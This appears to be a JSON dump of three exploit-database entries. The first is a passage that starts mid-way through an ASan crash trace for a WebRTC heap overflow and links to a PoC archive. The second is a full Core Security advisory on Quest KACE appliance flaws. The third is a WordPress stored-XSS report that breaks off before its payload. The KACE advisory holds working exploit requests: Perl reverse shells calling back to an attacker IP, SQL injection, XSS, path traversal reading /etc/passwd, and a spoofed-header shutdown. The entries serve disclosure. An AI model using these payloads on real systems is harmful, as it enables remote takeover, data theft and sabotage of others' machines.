v8::internal::Handle<v8::internal::Object>*) v8/src/execution.cc:202\r\n #32 0x55e00aa107b4 in v8::Function::Call(v8::Local<v8::Context>, v8::Local<v8::Value>, int, v8::Local<v8::Value>*) v8/src/api.cc:5218:7\r\n #33 0x55e015fe0a61 in blink::V8ScriptRunner::CallFunction(v8::Local<v8::Function>, blink::ExecutionContext*, v8::Local<v8::Value>, int, v8::Local<v8::Value>*, v8::Isolate*) third_party/blink/renderer/bindings/core/v8/v8_script_runner.cc:386:17\r\n #34 0x55e016028398 in blink::V8EventListener::CallListenerFunction(blink::ScriptState*, v8::Local<v8::Value>, blink::Event*) third_party/blink/renderer/bindings/core/v8/v8_event_listener.cc:115:8\r\n #35 0x55e016029a54 in blink::V8AbstractEventListener::InvokeEventHandler(blink::ScriptState*, blink::Event*, v8::Local<v8::Value>) third_party/blink/renderer/bindings/core/v8/v8_abstract_event_listener.cc:171:20\r\n #36 0x55e01602942b in blink::V8AbstractEventListener::HandleEvent(blink::ScriptState*, blink::Event*) third_party/blink/renderer/bindings/core/v8/v8_abstract_event_listener.cc:120:3\r\n #37 0x55e016029103 in blink::V8AbstractEventListener::handleEvent(blink::ExecutionContext*, blink::Event*) third_party/blink/renderer/bindings/core/v8/v8_abstract_event_listener.cc:108:3\r\n #38 0x55e017446ebe in blink::EventTarget::FireEventListeners(blink::Event*, blink::EventTargetData*, blink::HeapVector<blink::RegisteredEventListener, 1ul>&) third_party/blink/renderer/core/dom/events/event_target.cc:804:15\r\n #39 0x55e017445121 in blink::EventTarget::FireEventListeners(blink::Event*) third_party/blink/renderer/core/dom/events/event_target.cc:656:29\r\n #40 0x55e017444d5b in blink::EventTarget::DispatchEventInternal(blink::Event*) third_party/blink/renderer/core/dom/events/event_target.cc:560:41\r\n #41 0x55e017a0de87 in Create third_party/blink/renderer/core/events/progress_event.h:44:16\r\n #42 0x55e017a0de87 in blink::FileReader::FireEvent(WTF::AtomicString const&) third_party/blink/renderer/core/fileapi/file_reader.cc:471\r\n #43 0x55e017a0e6d4 in blink::FileReader::DidFinishLoading() third_party/blink/renderer/core/fileapi/file_reader.cc:427:3\r\n #44 0x55e00a9494ef in blink::mojom::blink::BlobReaderClientStubDispatch::Accept(blink::mojom::blink::BlobReaderClient*, mojo::Message*) gen/third_party/blink/public/mojom/blob/blob.mojom-blink.cc:168:13\r\n #45 0x55e00ea14f7e in mojo::InterfaceEndpointClient::HandleValidatedMessage(mojo::Message*) mojo/public/cpp/bindings/lib/interface_endpoint_client.cc:419:32\r\n #46 0x55e00ea258b3 in mojo::internal::MultiplexRouter::ProcessIncomingMessage(mojo::internal::MultiplexRouter::MessageWrapper*, mojo::internal::MultiplexRouter::ClientCallBehavior, base::SequencedTaskRunner*) mojo/public/cpp/bindings/lib/multiplex_router.cc:865:42\r\n #47 0x55e00ea2409e in mojo::internal::MultiplexRouter::Accept(mojo::Message*) mojo/public/cpp/bindings/lib/multiplex_router.cc:589:38\r\n #48 0x55e00ea0efa7 in mojo::Connector::ReadSingleMessage(unsigned int*) mojo/public/cpp/bindings/lib/connector.cc:443:51\r\n #49 0x55e00ea1081c in mojo::Connector::ReadAllAvailableMessages() mojo/public/cpp/bindings/lib/connector.cc:472:10\r\n #50 0x55e00ea00642 in Run base/callback.h:125:12\r\n #51 0x55e00ea00642 in mojo::SimpleWatcher::OnHandleReady(int, unsigned int, mojo::HandleSignalsState const&) mojo/public/cpp/system/simple_watcher.cc:274\r\n #52 0x55e00d52b6f5 in Run base/callback.h:96:12\r\n #53 0x55e00d52b6f5 in base::debug::TaskAnnotator::RunTask(char const*, base::PendingTask*) base/debug/task_annotator.cc:101\r\n #54 0x55e00c4afc95 in base::sequence_manager::internal::ThreadControllerImpl::DoWork(base::sequence_manager::internal::ThreadControllerImpl::WorkType) third_party/blink/renderer/platform/scheduler/base/thread_controller_impl.cc:166:21\r\n #55 0x55e00d52b6f5 in Run base/callback.h:96:12\r\n #56 0x55e00d52b6f5 in base::debug::TaskAnnotator::RunTask(char const*, base::PendingTask*) base/debug/task_annotator.cc:101\r\n #57 0x55e00d5881d5 in base::MessageLoop::RunTask(base::PendingTask*) base/message_loop/message_loop.cc:319:25\r\n #58 0x55e00d589444 in DeferOrRunPendingTask base/message_loop/message_loop.cc:329:5\r\n #59 0x55e00d589444 in base::MessageLoop::DoWork() base/message_loop/message_loop.cc:373\r\n #60 0x55e00d591acf in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) base/message_loop/message_pump_default.cc:37:31\r\n #61 0x55e00d600551 in base::RunLoop::Run() base/run_loop.cc:102:14\r\n #62 0x55e01bfb0599 in content::RendererMain(content::MainFunctionParams const&) content/renderer/renderer_main.cc:218:23\r\n #63 0x55e00cafbca5 in content::RunZygote(content::ContentMainDelegate*) content/app/content_main_runner_impl.cc:567:14\r\n #64 0x55e00caff751 in content::ContentMainRunnerImpl::Run() content/app/content_main_runner_impl.cc:969:10\r\n #65 0x55e00cb1e6c3 in service_manager::Main(service_manager::MainParams const&) services/service_manager/embedder/main.cc:459:29\r\n #66 0x55e00cafa2d0 in content::ContentMain(content::ContentMainParams const&) content/app/content_main.cc:19:10\r\n #67 0x55e006081fe3 in ChromeMain chrome/app/chrome_main.cc:101:12\r\n #68 0x7fa3ceac32b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)\r\n \r\nSUMMARY: AddressSanitizer: heap-buffer-overflow third_party/webrtc/modules/rtp_rtcp/source/forward_error_correction.cc:615:34 in XorPayloads\r\nShadow bytes around the buggy address:\r\n 0x0c3680767f90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c3680767fa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c3680767fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c3680767fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c3680767fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n=>0x0c3680767fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00[fa]fa\r\n 0x0c3680767ff0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c3680768000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c3680768010: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n 0x0c3680768020: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n 0x0c3680768030: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n Shadow gap: cc\r\n==109993==ABORTING\r\n \r\nTo reproduce this issue:\r\n \r\n1) Apply new.patch to a fresh WebRTC tree\r\n2) Build video_replay\r\n3) Download the attached files and run ./video_replay --input_file fec\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/45444.zip\n\n# 0day.today [2018-09-22] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31144"}, {"lastseen": "2018-06-01T15:07:08", "bulletinFamily": "exploit", "description": "Quest KACE System Management Appliance version 8.0 (Build 8.0.318) suffers from code execution, cross site scripting, path traversal, remote SQL injection, and various other vulnerabilities.", "modified": "2018-06-01T00:00:00", "published": "2018-06-01T00:00:00", "id": "1337DAY-ID-30515", "href": "https://0day.today/exploit/description/30515", "title": "Quest KACE System Management Appliance 8.0 - Multiple Vulnerabilities", "type": "zdt", "sourceData": "Quest KACE System Management Appliance Multiple Vulnerabilities\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: Quest KACE System Management Appliance Multiple Vulnerabilities\r\nAdvisory ID: CORE-2018-0004\r\nAdvisory URL:\r\nhttp://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities\r\nDate published: 2018-05-31\r\nDate of last update: 2018-05-22\r\nVendors contacted: Quest Software Inc.\r\nRelease mode: Forced release\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Improper Neutralization of Special Elements used in an OS Command\r\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\r\n[CWE-78], Deserialization of Untrusted Data [CWE-502], Improper Privilege\r\nManagement [CWE-269], Improper Privilege Management [CWE-269], Improper\r\nAuthorization [CWE-285], Improper Neutralization of Special Elements used\r\nin an SQL Command [CWE-89], Improper Neutralization of Special Elements\r\nused in an SQL Command [CWE-89], Improper Neutralization of Input During\r\nWeb Page Generation [CWE-79], External Control of File Name or Path\r\n[CWE-73], External Control of File Name or Path [CWE-73]\r\nImpact: Code execution\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: Yes\r\nCVE Name: CVE-2018-11138, CVE-2018-11139, CVE-2018-11135, CVE-2018-11134,\r\nCVE-2018-11132, CVE-2018-11142, CVE-2018-11136, CVE-2018-11140,\r\nCVE-2018-11133,\r\nCVE-2018-11137, CVE-2018-11141\r\n\r\n3. *Vulnerability Description*\r\n\r\n>From Quest KACE's website:\r\n\r\n\"The KACE Systems Management Appliance [1] provides\r\nyour growing organization with comprehensive management of network-connected\r\ndevices, including servers, PCs, Macs, Chromebooks, tablets, printers,\r\nstorage, networking gear and the Internet of Things (IoT). KACE can fulfill\r\nall of your organization's systems management needs, from initial deployment\r\nto ongoing management and retirement.\"\r\n\r\nMultiple vulnerabilities were found in the Quest KACE System Management\r\nVirtual Appliance that would allow a remote attacker to gain command\r\nexecution as root. We present three vectors to achieve this, including\r\none that can be exploited as an unauthenticated user.\r\n\r\nAdditional web application vulnerabilities were found in the web console\r\nthat is bundled with the product. These vulnerabilities are detailed in\r\nsection 7.\r\n\r\nNote: This advisory has limited details on the vulnerabilities because\r\nduring the attempted coordinated disclosure process, Quest advised us not\r\nto distribute our original findings to the public or else they would\r\ntake legal action. Quest's definition of \"responsible disclosure\" can be\r\nfound at\r\nhttps://support.quest.com/essentials/reporting-security-vulnerability.\r\n\r\nCoreLabs has been publishing security advisories since 1997 and believes\r\nin coordinated disclosure and good faith collaboration with software vendors\r\nbefore disclosure to help ensure that a fix or workaround solution is ready\r\nand available when the vulnerability details are publicized. We believe\r\nthat providing technical details about each finding is necessary to provide\r\nusers and organizations with enough information to understand the\r\nimplications\r\nof the vulnerabilities against their environment and, most importantly, to\r\nprioritize the remediation activities aiming at mitigating risk.\r\n\r\nWe regret Quest's posture on disclosure during the whole process (detailed\r\nin the Report Timeline section) and the lack of a possibility of engaging\r\ninto a coordinated publication date, something we achieve (and have\r\nachieved) with many vendors as part of our coordinated disclosure practices.\r\n\r\n4. *Vulnerable Packages*\r\n\r\n. Quest KACE System Management Appliance 8.0 (Build 8.0.318)\r\nOther products and versions might be affected too, but they were not tested.\r\n\r\n5. *Vendor Information, Solutions and Workarounds*\r\n\r\nQuest reports that it has released the security vulnerability patch\r\nSEC2018_20180410 to address the reported vulnerabilities.\r\nPatch can be download at\r\nhttps://support.quest.com/download-install-detail/6086148.\r\n\r\nFor more details, Quest published the following Security Note:\r\nhttps://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-\r\n\r\n6. *Credits*\r\n\r\nThese vulnerabilities were discovered and researched by Leandro Barragan\r\nand Guido Leo from Core Security Consulting Services. The publication of\r\nthis advisory was coordinated by Leandro Cuozzo from Core Advisories Team.\r\n\r\n7. *Technical Description / Proof of Concept Code*\r\n\r\nQuest KACE SMA ships with a web console that provides administrators and\r\nusers with several features. Multiple vulnerabilities were found in the\r\ncontext of this console, both from an authenticated and unauthenticated\r\nperspective.\r\n\r\nSection 7.1 describes how an unauthenticated attacker could gain command\r\nexecution on the system as the web server user.\r\n\r\nVulnerabilities described in 7.2 and 7.3 could also be abused to gain code\r\nexecution but would require the attacker to have a valid authentication\r\ntoken.\r\n\r\nIn addition, issues found in the Sudo Server module presented in 7.4 and\r\n7.5 would allow the attacker to elevate his privileges from the web server\r\nuser to root, effectively obtaining full control of the device.\r\n\r\nAdditional web application vulnerabilities were found in the console, such\r\nas insufficient authorization for critical functions, which would allow an\r\nanonymous attacker to reconfigure the appliance (7.6), SQL injection\r\nvulnerabilities (7.7, 7,8), a cross-site scripting issue (7.9), and path\r\ntraversal vulnerabilities, which would allow an attacker to read, write and\r\ndelete arbitrary files (7.9, 7.10, 7.11).\r\n\r\n7.1. *Unauthenticated command injection*\r\n\r\n[CVE-2018-11138]\r\nThe '/common/download_agent_installer.php' script is accessible to anonymous\r\nusers in order to download an agent for a specific platform. This behavior\r\ncan be abused to execute arbitrary commands on the system.\r\n\r\nThe script receives the following parameters via the GET method:\r\n\r\n. platform: Indicates the platform in which the agent is going to be\r\ninstalled\r\n. serv: SHA256 hash of a fixed value that depends of each appliance\r\n. orgid: Organization ID\r\n. version: Version number of the agent\r\n\r\nThe last two conditions are simple to meet. The Agent versions are publicly\r\navailable within the Quest KACE site, but even if they were not, we found\r\nthat the Organization ID parameter is vulnerable to a time based SQL\r\ninjection\r\n(refer to issue 7.7).\r\nThis would make it possible to obtain the agent version by querying the\r\ntable 'CLIENT_DISTRIBUTION' and fetching the contents of the 'VERSION'\r\ncolumn. The Organization ID is 1 by default, but could be obtained in the\r\nsame way as the Agent version by querying the table 'ORGANIZATION' and\r\nthe column 'ID'.\r\n\r\nAs stated above, the application uses the Organization ID and Agent\r\nversion parameters to execute commands. This means we need to find a way\r\nto append system commands within the Organization ID, without breaking the\r\nSQL query. If we use the comment symbol (#), we can append anything we want\r\nwithout affecting the result of the query.\r\n\r\nPreparing payload:\r\n\r\n/-----\r\n- platform = windows\r\n- serv = ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c\r\n- orgid = 1#;perl -e 'use\r\nSocket;$i=\"[AttackerIP]\";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/bash\r\n-i\");};';\r\n- version = 8.0.152 (last agent version available for windows)\r\n-----/\r\n\r\nThe following proof of concept executes a reverse shell:\r\n\r\n/-----\r\nGET\r\n/common/download_agent_installer.php?platform=windows&serv=ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c&orgid=1%23%3bperl+-e+'use+Socket%3b$i%3d\"[AttackerIP]\"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">%26S\")%3bopen(STDOUT,\">%26S\")%3bopen(STDERR,\">%26S\")%3bexec(\"/bin/sh+-i\")%3b}%3b'%3b&version=8.0.152\r\nHTTP/1.1\r\nHost: Server\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nConnection: close\r\nUpgrade-Insecure-Requests: 1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 0\r\n-----/\r\n\r\n/-----\r\n$ nc -lvp 8080\r\nListening on [0.0.0.0] (family 0, port 8080)\r\nConnection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2,\r\nsport 20050)\r\nsh: can't access tty; job control turned off\r\n$ id\r\nuid=80(www) gid=80(www) groups=80(www)\r\n-----/\r\n\r\n7.2. *Authenticated command injection*\r\n\r\n[CVE-2018-11139]\r\nThe '/common/ajax_email_connection_test.php' script used to test the\r\nconfigured\r\nSMTP server is accessible by any authenticated user and can be abused to\r\nexecute arbitrary commands on the system. This script is vulnerable to\r\ncommand injection via the unsanitized user input 'TEST_SERVER' sent to the\r\nscript via POST method.\r\n\r\nThe following proof of concept executes a reverse shell:\r\n\r\n/-----\r\nPOST /common/ajax_email_connection_test.php HTTP/1.1\r\nHost: [ServerIP]\r\nAccept: application/json, text/javascript, */*; q=0.01\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nContent-Length: 416\r\nCookie: [Cookie]\r\nConnection: close\r\n\r\nTEST_SERVER=test;perl+-e+'use+Socket%3b$i%3d\"[AttackerIP]\"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">%26S\")%3bopen(STDOUT,\">%26S\")%3bopen(STDERR,\">%26S\")%3bexec(\"/bin/sh+-i\")%3b}%3b';&TEST_PORT=587&[email\u00a0protected]&TEST_PASSWORD=1234&TEST_OLD_PASSWORD=&QUEUE_ID=1&[email\u00a0protected]&ACTION=TEST_CONNECTION_SMTP\r\n-----/\r\n\r\n/-----\r\n$ nc -lvp 8080\r\nListening on [0.0.0.0] (family 0, port 8080)\r\nConnection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2,\r\nsport 20050)\r\nsh: can't access tty; job control turned off\r\n$ id\r\nuid=80(www) gid=80(www) groups=80(www)\r\n-----/\r\n\r\n7.3. *PHP Object Injection leading to arbitrary command execution*\r\n\r\n[CVE-2018-11135]\r\nAn authenticated user could abuse a deserialization call on the script\r\n'/adminui/error_details.php' to inject arbitrary PHP objects.\r\n\r\nTo exploit this issue, the parameter 'ERROR_MESSAGES' needs to be an array\r\nand meet some specific conditions in order to successfully exploit the\r\nissue.\r\n\r\n7.4. *Privilege escalation via password change in Sudo Server*\r\n\r\n[CVE-2018-11134]\r\nIn order to perform actions that requires higher privileges, the application\r\nrelies on a message queue managed that runs with root privileges and only\r\nallows a set of commands.\r\n\r\nOne of the available commands allows to change any user's password\r\n(including root).\r\n\r\nAssuming we are able to run commands in the server, we could abuse this\r\nfeature by changing the password of the 'kace_support' account, which\r\ncomes disabled by default but has full sudo privileges.\r\n\r\n7.5. *Privilege escalation via command injection in Sudo Server*\r\n\r\n[CVE-2018-11132]\r\nAs mentioned in the issue [7.4], in order to perform actions that require\r\nhigher privileges, the application relies on a message queue that runs\r\ndaemonized with root privileges and only allows a set of commands to be\r\nexecuted.\r\n\r\nA command injection vulnerability exists within this message queue which\r\nallows us to append arbitrary commands that will be run as root.\r\n\r\n7.6. *Insufficient Authorization for critical function*\r\n\r\n[CVE-2018-11142]\r\n'systemui/settings_network.php' and 'systemui/settings_patching.php'\r\nscripts are accessible only from localhost. This restriction can be bypassed\r\nby modifying the 'Host' and 'X_Forwarded_For' HTTP headers.\r\n\r\nThe following proof of concept abuses this vulnerability to shutdown the\r\nserver as an anonymous user:\r\n\r\n/-----\r\nPOST /systemui/settings_network.php HTTP/1.1\r\nHost: localhost\r\nX-Forwarded-For: ::1\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://[ServerIp]/systemui/settings_network.php\r\nContent-Type: multipart/form-data;\r\nboundary=---------------------------5642543667001619951434940129\r\nContent-Length: 3418\r\nConnection: close\r\nUpgrade-Insecure-Requests: 1\r\n\r\n-----------------------------5642543667001619951434940129\r\nContent-Disposition: form-data; name=\"CSRF_TOKEN\"\r\n-----------------------------5642543667001619951434940129\r\nContent-Disposition: form-data; name=\"$shutdown\"\r\nDoIt!\r\nContent-Disposition: form-data; name=\"save\"\r\nSave\r\n-----------------------------5642543667001619951434940129--\r\n-----/\r\n\r\n7.7. *Unauthenticated SQL Injection in download_agent_installer.php*\r\n\r\n[CVE-2018-11136]\r\nThe 'orgID' parameter received by the '/common/download_agent_installer.php'\r\nscript is not sanitized, leading to SQL injection. In particular, a blind\r\ntime based type.\r\n\r\nThe following proof of concept induces a time delay:\r\n\r\n/-----\r\nhttp://[ServerIP]/common/download_agent_installer.php?platform=windows&serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f&orgid=1\r\nAND SLEEP(10)%23;&version=8.0.152\r\n-----/\r\n\r\n7.8. *SQL Injection in run_report.php*\r\n\r\n[CVE-2018-11140]\r\nThe 'reportID' parameter received by the '/common/run_report.php' script\r\nis not sanitized, leading to SQL injection. In particular, an error based\r\ntype.\r\n\r\nThe following proof of concept retrieves the current database name:\r\n\r\n/-----\r\nPOST /common/run_report.php HTTP/1.1\r\nContent-Length: 161\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nHost: [ServerIP]\r\nAccept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8\r\nConnection: close\r\nReferer: http://[ServerIP]/adminui/analysis_report_list.php?CATEGORY_ID=\r\nUpgrade-Insecure-Requests: 1\r\nContent-Type: application/x-www-form-urlencoded\r\nCookie: [Cookie]\r\n\r\ndate=1516135247598&reportId=-3161+UNION+ALL+SELECT+CONCAT(0x7170706a71,IFNULL(CAST(DATABASE()+AS+CHAR),0x20),0x716a707171),NULL--+LhEx&reportName=&format=pdf\r\n-----/\r\n\r\n/-----\r\nHTTP/1.1 200 OK\r\nDate: Thu, 08 Feb 2018 21:50:21 GMT\r\nServer: Apache\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0,\r\npre-check=0\r\nPragma: no-cache\r\nVary: Accept-Encoding\r\nAccess-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key,\r\nx-kace-auth-signature, accept, origin, content-type\r\nAccess-Control-Allow-Origin: *\r\nAccess-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS\r\nX-KACE-Appliance: K1000\r\nX-KACE-Host: [ServerIP]\r\nX-KACE-Version: 8.0.318\r\nX-KBOX-WebServer: [ServerIP]\r\nX-KBOX-Version: 8.0.318\r\nX-KACE-WebServer: [ServerIP]\r\nX-UA-Compatible: IE=9,EDGE\r\nCache-Control: private, no-cache, no-store, proxy-revalidate, no-transform\r\nContent-Length: 3548\r\nConnection: close\r\nContent-Type: text/html; charset=utf-8\r\n\r\n[...SNIPPED...]\r\n<script type=\"text/javascript\"\r\nsrc=\"/common/js/vendor/html5.js?BUILD=318\" /></script>\r\n<![endif]--><title>Report Queued: qppjqORG1qjpqq</title><meta\r\nhttp-equiv='refresh'\r\n[...SNIPPED...]\r\n-----/\r\n\r\n7.9. *Unauthenticated Cross Site Scriting in run_cross_report.php*\r\n\r\n[CVE-2018-11133]\r\nThe 'fmt' parameter of the '/common/run_cross_report.php' script is\r\nvulnerable to cross-site scripting.\r\n\r\nThe following proof of concept demonstrates the vulnerability:\r\n\r\n/-----\r\nhttp://[ServerIP]/common/run_cross_report.php?uniqueId=366314513&id=585&org=1&fmt=xls34403')%3balert(1)%2f%2f952\r\n-----/\r\n\r\n7.10. *Path traversal in download_attachment.php leading to arbitrary\r\nfile read*\r\n\r\n[CVE-2018-11137]\r\nThe 'checksum' parameter of the '/common/download_attachment.php' script can\r\nbe abused to read arbitrary files with 'www' privileges. The following proof\r\nof concept reads the '/etc/passwd' file. No administrator privileges are\r\nneeded to execute this script.\r\n\r\nIt is worth noting that there are several interesting files that can be\r\nread with 'www' privileges, such as all the files located in\r\n'/kbox/bin/koneas/keys/' and '/kbox/kboxwww/include/globals.inc',\r\nwhich contain plaintext passwords.\r\n\r\n/-----\r\nhttp://[ServerIP]/common/run_cross_report.php?uniqueId=366314513&id=585&org=1&fmt=xls34403')%3balert(1)%2f%2f952\r\n-----/\r\n\r\nThe following proof of concept demonstrates the vulnerability:\r\n\r\n/-----\r\nGET\r\n/common/download_attachment.php?checksum=/../../../../../../../../../../../etc/passwd&filename=\r\nHTTP/1.1\r\nHost: [ServerIP]\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nCookie: [Cookie]\r\nConnection: close\r\nUpgrade-Insecure-Requests: 1\r\n\r\nHTTP/1.1 200 OK\r\nDate: Thu, 18 Jan 2018 17:18:19 GMT\r\nServer: Apache\r\nCache-Control: must-revalidate, post-check=0, pre-check=0\r\nExpires: -1\r\nPragma: public\r\nContent-Disposition: attachment; filename=\"\"\r\nContent-Transfer-Encoding: Binary\r\nContent-Description: K1000 attachment\r\nContent-Length: 2400\r\nAccess-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key,\r\nx-kace-auth-signature, accept, origin, content-type\r\nAccess-Control-Allow-Origin: *\r\nAccess-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS\r\nX-KACE-Appliance: K1000\r\nX-KACE-Host: k10000.\r\nX-KACE-Version: 8.0.318\r\nX-KBOX-WebServer: k10000.\r\nX-KBOX-Version: 8.0.318\r\nX-KACE-WebServer: k10000.\r\nX-UA-Compatible: IE=9,EDGE\r\nCache-Control: private, no-cache, no-store, proxy-revalidate, no-transform\r\nConnection: close\r\nContent-Type: application/octet-stream\r\n\r\n# $FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $\r\n#\r\nroot:*:0:0:Charlie &:/root:/bin/csh\r\ndaemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin\r\noperator:*:2:5:System &:/:/usr/sbin/nologin\r\nbin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin\r\ntty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin[...SNIPPED...]\r\n-----/\r\n\r\n7.11. *Path traversal in advisory.php leading to arbitrary file\r\ncreation/deletion*\r\n\r\n[CVE-2018-11141]\r\nThe 'IMAGES_JSON' and 'attachments_to_remove[]' parameters of the\r\n'/adminui/advisory.php' script can be abused to write and delete files\r\nrespectively. The following proof of concept creates a file located at\r\n'/kbox/kboxwww/resources/TestWrite' with the content 'Sarasa' (base64\r\nencoded).\r\nFiles can be at any location where the 'www' user has write permissions.\r\n\r\nFile deletion could be abused to delete\r\n'/kbox/kboxwww/systemui/reports/setup_completed.log' file. This file's\r\nexistence defines if the appliance setup wizard is shown or not.\r\n\r\nThe following proof of concept demonstrates the vulnerability:\r\n\r\n/-----\r\nPOST /adminui/advisory.php?ID=10 HTTP/1.1\r\nHost: [ServerIP]\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://[ServerIP]/adminui/advisory.php?ID=10\r\nContent-Type: multipart/form-data;\r\nboundary=---------------------------2671551246366368501556269100\r\nContent-Length: 1705\r\nCookie: [Cookie]\r\nConnection: close\r\nUpgrade-Insecure-Requests: 1\r\n\r\n-----------------------------2671551246366368501556269100\r\nContent-Disposition: form-data; name=\"CSRF_TOKEN\"\r\n\r\n99c2addf067719d6fc3ae32ded351f000af8efdd091f162baa2a34516cefecc741cb13a69c80554a9ba32908d1c683102d3455eac39bcafc8854f46a04b2044e\r\n-----------------------------2671551246366368501556269100\r\nContent-Disposition: form-data; name=\"IMAGES_JSON\"\r\n\r\n{\"/../../../resources/TestWrite\":\"aaaaaa,VGVzdENvbnRlbnQ=\"}\r\n-----------------------------2671551246366368501556269100\r\nContent-Disposition: form-data; name=\"FARRAY[ID]\"\r\n[...SNIPPED...]\r\n-----/\r\n\r\nTaking advantage of 7.2 and 7.4 we are able to verify the file creation:\r\n\r\n/-----\r\n[[email\u00a0protected] /kbox/kboxwww/resources]# ls -lha\r\ntotal 32\r\ndrwxr-xr-x 2 www wheel 512B Feb 9 20:40 .\r\ndrwxr-xr-x 23 root wheel 512B Nov 14 18:29 ..\r\n-rw-r--r-- 1 www wheel 11B Feb 9 20:40 TestWrite\r\n-----/\n\n# 0day.today [2018-06-01] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30515"}, {"lastseen": "2018-02-15T21:19:38", "bulletinFamily": "exploit", "description": "WordPress FancyProductDesigner plugin versions prior to 3.4.2 suffer from a persistent cross site scripting vulnerability due to improper sanitization, allowing malicious .svg file uploads.", "modified": "2017-05-03T00:00:00", "published": "2017-05-03T00:00:00", "href": "https://0day.today/exploit/description/27710", "id": "1337DAY-ID-27710", "title": "WordPress FancyProductDesigner 3.4.2 Stored XSS Vulnerability", "type": "zdt", "sourceData": "[+]---------------------------------------------------------[+]\r\n | Vulnerable Software: FancyProductDesigner(WP plugin) |\r\n | Vendor: http://fancyproductdesigner.com |\r\n | Vulnerability Type: Stored XSS + FPD / File upload |\r\n | Date Released: 29/04/2017 |\r\n | Released by: 5tarboy (@insecurity) |\r\n [+]---------------------------------------------------------[+]\r\n\r\nFancy Product Designer is a paid wordpress plugin ($50 fee) that allows users to upload custom products of their choice\r\nto the site. The upload form claims that it only allows files of PNG and JPG format, but it is possible to upload SVG\r\nfiles also. There are estimated 40,000-50,000 vulnerable sites. \r\n\r\nIn order to replicate this vulnerability you navigate to the product upload page and simply upload an .svg payload.\r\nHere is an example: https://www.saltsidecreations.com/product/ozark-20-oz/\r\nIt is possible to upload an .svg file via the image upload form - the file will be stored at http://[HOST]/wp-content/uploads/\r\n\r\nHere is an example SVG file that can be uploaded (resulting in persistent/stored XSS):\r\n------------------------------------------------------------------------------------------------------------\r\n\r\n<?xml 